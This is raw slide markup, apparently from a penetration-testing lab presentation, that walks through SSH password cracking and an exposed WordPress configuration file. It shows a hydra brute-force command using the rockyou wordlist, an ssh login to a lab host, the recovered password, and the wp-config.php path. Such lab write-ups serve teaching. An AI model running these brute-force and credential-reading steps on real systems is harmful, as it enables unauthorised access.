                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="7" name="Picture 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5ABF2B7B-8E9D-377A-F981-EB84C3BCD12B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1468966" y="3677224"/>
            <a:ext cx="16691018" cy="8341401"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1399512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0"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2401" name="Google Shape;2401;p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b="1" dirty="0"/>
              <a:t>Exploitation 2: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" dirty="0"/>
              <a:t>SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0"/>
              <a:t>Weak Password Vulnerability</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2402" name="Google Shape;2402;p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12</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2403" name="Google Shape;2403;p9"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="1859300"/>
            <a:ext cx="22942800" cy="113599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a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Run  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>hydra –l </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>michael</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –P /</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/share/wordlists/rockyou.txt </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1435100" lvl="1" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="1892300" lvl="2" indent="-571500" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buChar char="⮚"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> m</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" u="sng" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>ichael@192.168.1.110</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> –p 22</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1435100" lvl="1" indent="-292100" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Noto Sans Symbols"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400"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07"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2408" name="Google Shape;2408;p10"/>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13</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2409" name="Google Shape;2409;p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
        <p:nvSpPr>
          <p:cNvPr id="2410" name="Google Shape;2410;p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dirty="0"/>
              <a:t>Exploitation 2: SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Weak Password Vulnerability</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2411" name="Google Shape;2411;p10"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="1697375"/>
            <a:ext cx="22942800" cy="113599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 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	a. Michael’s password: “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>michae</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>l”</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2412" name="Google Shape;2412;p10"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2219326" y="3438525"/>
            <a:ext cx="20347712" cy="96630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6"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2417" name="Google Shape;2417;p11"/>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14</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2418" name="Google Shape;2418;p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
        <p:nvSpPr>
          <p:cNvPr id="2419" name="Google Shape;2419;p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dirty="0"/>
              <a:t>Exploitation 2: SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0"/>
              <a:t>Weak Password Vulnerability </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0"/>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2420" name="Google Shape;2420;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="815725" y="2207475"/>
            <a:ext cx="23177750" cy="10903592"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="914400" marR="0" lvl="0" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>What did the exploit achieve?</a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="406400" marR="0" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buFont typeface="Roboto"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="0" i="0" u="none" strike="noStrike" cap="none" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>   b. Remotely login and connection to Michael’s directory. </a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2421" name="Google Shape;2421;p11"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1142120" y="4171892"/>
            <a:ext cx="18903078" cy="8334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25"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2426" name="Google Shape;2426;p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b="1" dirty="0"/>
              <a:t>Exploitation 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WordPress Configuration File Exposed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="7200" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" sz="6600" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2427" name="Google Shape;2427;p1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15</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2428" name="Google Shape;2428;p12"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="1859300"/>
            <a:ext cx="22942800" cy="113599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a:t>
            </a:r>
            <a:endParaRPr dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="1371600" lvl="1" indent="-508000" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="4400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> navigating to: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/var/www/html/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>wordpress</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/wp-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="4400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>config.php</a:t>
            </a:r>
            <a:endParaRPr sz="4400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="863600" lvl="1" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="406400" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1000"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="4400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="4400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="dk1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8121BF21-3F41-C03A-E7B1-97237F74406D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="4775781"/>
            <a:ext cx="17657763" cy="78063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3"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2434" name="Google Shape;2434;p1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16</a:t>
            </a:fld>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2435" name="Google Shape;2435;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
        <p:nvSpPr>
          <p:cNvPr id="2436" name="Google Shape;2436;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dirty="0"/>
              <a:t>Exploitation 3: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="6000" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
              <a:t>WordPress Configuration File Exposed</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="6600" b="1" dirty="0">
                <a:latin typeface="Roboto"/>
                <a:ea typeface="Roboto"/>
                <a:cs typeface="Roboto"/>
                <a:sym typeface="Roboto"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2437" name="Google Shape;2437;p13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="703389" y="1697375"/>
            <a:ext cx="22942800" cy="11359900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="1219000" tIns="0" rIns="1219000" bIns="2437975" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>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 </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
